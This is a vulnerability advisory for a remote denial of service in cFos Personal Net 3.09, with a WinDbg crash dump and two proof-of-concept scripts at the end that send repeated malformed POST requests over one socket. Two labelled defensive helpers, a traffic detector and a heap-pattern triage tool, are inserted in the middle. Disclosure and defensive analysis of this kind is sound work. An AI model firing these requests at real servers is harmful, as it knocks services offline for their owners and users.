cFos Personal Net v3.09 Remote Heap Memory Corruption Denial of Service


Vendor: cFos Software GmbH
Product web page: https://www.cfos.de
Affected version: 3.09

Summary: cFos Personal Net (PNet) is a full-featured HTTP server intended for
personal and professional use. For personal use, instead of hosting websites
with a webhoster, you just run it on your Windows machine. For professional
use, you rent a virtual Windows PC or dedicated PC from a webhoster and run
it there.

Desc: cFos Personal Net web server is vulnerable to a remote denial of service
issue when processing multiple malformed POST requests in less than 3000ms.
The issue occurs when the application fails to handle the data sent in the
POST requests over a single socket connection, causing heap memory corruption
that results in a crash of the HTTP service.

SHODAN: cFos Personal Net v3.09 Microsoft-HTTPAPI/2.0

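Added defensive example, not part of the original advisory: a small detector for the traffic pattern described above (many POSTs to one path from a single connection inside a 3000 ms window). The log line format, identifying a connection by source ip:port, the threshold of 10 and the sample lines are all constructed assumptions.

```python
from collections import deque
from datetime import datetime, timedelta

WINDOW = timedelta(milliseconds=3000)  # the advisory's "less than 3000ms"
THRESHOLD = 10                         # POSTs per connection inside the window before alerting (assumed tuning)

def parse_line(line):
    """Parse one constructed log line: '<ISO time> <src_ip:src_port> <METHOD> <path>'."""
    ts, src, method, path = line.split()
    return datetime.fromisoformat(ts), src, method, path

def detect_post_bursts(lines, window=WINDOW, threshold=THRESHOLD):
    """Alert once per (connection, path) when >= threshold POSTs land inside one sliding window.

    A connection is approximated by source ip:port, because the advisory's trigger is
    many malformed POSTs over a single socket rather than many distinct clients.
    """
    recent, alerts = {}, []
    for line in lines:
        ts, src, method, path = parse_line(line)
        if method != "POST":
            continue
        q = recent.setdefault((src, path), deque())
        q.append(ts)
        while ts - q[0] > window:      # drop timestamps that fell out of the window
            q.popleft()
        if len(q) == threshold:        # fires on the request that crosses the line
            alerts.append((src, path, len(q), ts.isoformat()))
    return alerts

def sample_log():
    """Constructed sample: one connection firing 30 POSTs 50 ms apart, one benign slow client."""
    t0 = datetime(2014, 4, 1, 10, 0, 0)
    path = "/scripts/get_server_stats.jss?name="
    lines = [f"{(t0 + timedelta(milliseconds=50 * i)).isoformat()} 10.0.0.5:51234 POST {path}" for i in range(30)]
    lines += [f"{(t0 + timedelta(seconds=5 * i)).isoformat()} 10.0.0.9:40010 POST {path}" for i in range(3)]
    lines.append(f"{t0.isoformat()} 10.0.0.9:40010 GET /index.html")
    return lines

if __name__ == "__main__":
    for alert in detect_post_bursts(sample_log()):
        print("POST burst: connection %s path %s (%d requests, last at %s)" % alert)
```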
============================================================================

(658.1448): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Module load completed but symbols could not be loaded for cfospnet.exe
eax=feeefeee ebx=02813dcc ecx=02813dcc edx=00000000 esi=028198b0 edi=02813c88
eip=00914529 esp=03b1fb94 ebp=03b1fbb8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
cfospnet+0x54529:
00914529 ff5004 call dword ptr [eax+4] ds:002b:feeefef2=????????
0:024> d ecx
02813dcc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813ddc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813dec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813dfc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813e0c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813e1c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813e2c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813e3c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0:024> d
02813e4c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813e5c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813e6c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813e7c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813e8c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813e9c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813eac ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813ebc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0:024> d
02813ecc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813edc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813eec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813efc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813f0c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813f1c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813f2c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813f3c ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21 .............f.!
0:024> d
02813f4c 8e e8 06 18 d0 71 2d 04-c0 f8 80 02 d0 71 2d 04 .....q-......q-.
02813f5c 01 00 ad ba 5f 43 46 50-4e 45 54 5f 50 41 54 48 ...._CFPNET_PATH
02813f6c 00 f0 ad ba 0c 00 00 00-0f 00 00 00 90 41 2c 04 .............A,.
02813f7c 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 29 00 00 00 ............)...
02813f8c 2f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 /...............
02813f9c 00 00 00 00 aa 66 9a 38-dc e8 06 00 10 31 2c 04 .....f.8.....1,.
02813fac d0 0c 81 02 ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813fbc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0:024> d
02813fcc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813fdc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813fec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813ffc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0281400c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0281401c ee fe ee fe ee fe ee fe-ee fe ee fe be 66 99 2f .............f./
0281402c c6 e8 06 18 0a 00 00 00-6e 00 61 00 6d 00 65 00 ........n.a.m.e.
0281403c 3d 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 =...............
0:024> d
0281404c 00 00 00 00 b0 66 9a 22-d2 e8 06 00 60 8b 80 02 .....f."....`...
0281405c 10 c9 2b 04 ee fe ee fe-ee fe ee fe ee fe ee fe ..+.............
0281406c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0281407c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0281408c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0281409c ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21 .............f.!
028140ac dc e8 06 18 e8 08 81 02-30 37 86 02 c0 4b 81 02 ........07...K..
028140bc 00 00 ad ba 52 45 51 55-45 53 54 5f 55 52 49 00 ....REQUEST_URI.
0:024> d
028140cc 0d f0 ad ba 0b 00 00 00-0f 00 00 00 08 41 81 02 .............A..
028140dc 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 1d 00 00 00 ................
028140ec 1f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 ................
028140fc 00 00 00 00 bc 66 99 2d-dc e8 06 18 2f 73 63 72 .....f.-..../scr
0281410c 69 70 74 73 2f 67 65 74-5f 73 65 72 76 65 72 5f ipts/get_server_
0281411c 73 74 61 74 73 2e 6a 73-73 00 ad ba ab ab ab ab stats.jss.......
0281412c ab ab ab ab 00 00 00 00-00 00 00 00 ad 66 9a 3f .............f.?
0281413c d0 e8 06 00 c8 4a 2c 04-f0 18 2d 04 ee fe ee fe .....J,...-.....
0:024> d
0281414c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0281415c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0281416c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0281417c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0281418c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0281419c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
028141ac ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
028141bc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
0:024> d esi
028198b0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
028198c0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
028198d0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
028198e0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
028198f0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
02819900 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
02819910 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
02819920 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
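
Added triage helper, not from the original advisory: it parses WinDbg `d` rows in the format of the listing above and names the Windows debug-heap fill patterns they carry (0xfeeefeee is written over freed blocks, 0xbaadf00d over fresh allocations that were never written, 0xabababab are the guard bytes after a block), then checks which crash registers hold such a fill value. That is what makes eax=feeefeee at `call dword ptr [eax+4]` readable as a pointer loaded from already-freed heap memory. The sample rows are copied from the listing above; the function names are assumptions.

```python
import re
# Windows debug-heap fill dwords (seen under WinDbg / gflags heap checking), keyed by little-endian byte form.
PATTERNS = {
    bytes.fromhex("eefeeefe"): "freed block (0xfeeefeee)",
    bytes.fromhex("0df0adba"): "uninitialised (0xbaadf00d)",
    bytes.fromhex("abababab"): "tail guard (0xabababab)",
}
# One WinDbg `d` row: address, 8 bytes, '-', 8 bytes, ASCII column.
ROW = re.compile(r"^([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}[ -]){15}[0-9a-fA-F]{2})\s+(.*)$")
REG = re.compile(r"\b(e[a-d]x|e[sd]i|e[bs]p|eip)=([0-9a-fA-F]{8})")
def parse_row(line):
    """Return (address, 16 bytes, ascii) for a `d` row, or None for prompts and other text."""
    m = ROW.match(line.rstrip())
    if not m:
        return None
    return int(m.group(1), 16), bytes.fromhex(m.group(2).replace("-", " ")), m.group(3)
def classify_row(data):
    """Name the fill pattern covering most dwords of a row and how many dwords it covers."""
    best = ("live data", 0)
    for fill, label in PATTERNS.items():
        hits = sum(1 for off in range(0, len(data), 4) if data[off:off + 4] == fill)
        if hits > best[1]:
            best = (label, hits)
    return best
def poisoned_registers(reg_line):
    """Registers whose value is itself a fill dword: a pointer read from freed or uninitialised heap."""
    found = {}
    for name, value in REG.findall(reg_line):
        for fill, label in PATTERNS.items():
            if int(value, 16) == int.from_bytes(fill, "little"):
                found[name] = label
    return found
def triage(listing):
    """Count `d` rows per dominant fill pattern."""
    counts = {}
    for row in filter(None, map(parse_row, listing.splitlines())):
        label = classify_row(row[1])[0]
        counts[label] = counts.get(label, 0) + 1
    return counts

# Sample rows copied from the crash listing above (a constructed subset) plus the crash registers.
SAMPLE = """\
0:024> d ecx
02813dcc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
02813f5c 01 00 ad ba 5f 43 46 50-4e 45 54 5f 50 41 54 48 ...._CFPNET_PATH
02813f8c 2f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 /...............
028198b0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................
"""
CRASH_REGS = "eax=feeefeee ebx=02813dcc ecx=02813dcc edx=00000000 esi=028198b0 edi=02813c88"
```

Running `triage(SAMPLE)` and `poisoned_registers(CRASH_REGS)` on the full listing shows that both `ecx` and the dereferenced `eax` sit in freed memory while `esi` points at a never-written allocation.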

============================================================================

Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2014-5184
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5184.php


01.04.2014

---


-ALGjlang

open_socket();
for (j = 1; j <= 30; j++)
{
    send_socket("
POST /scripts/get_server_stats.jss?name= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Host: 192.168.0.107
Content-Length: 20

AAAAAAAAAAAAAAAAAA\x0d\x0a\x0d\x0a
    ");
}
close_socket();


-SPKfzz

s_string("POST /scripts/get_server_stats.jss?name= HTTP/1.1\r\n");
s_string("User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n");
s_string("Accept: */*\r\n");
s_string("Host: 192.168.0.107\r\n");
s_string("Content-Length: ");
s_blocksize_string("fuzz",15);
s_string("\r\n\r\n");

s_block_start("fuzz");
s_string("joxypoxyjoxypoxy!!\r\n"); // this line is repeated 100 times in the fuzz run
s_string_variable("ZSL");
s_string("\r\n"); // important
s_block_end("fuzz");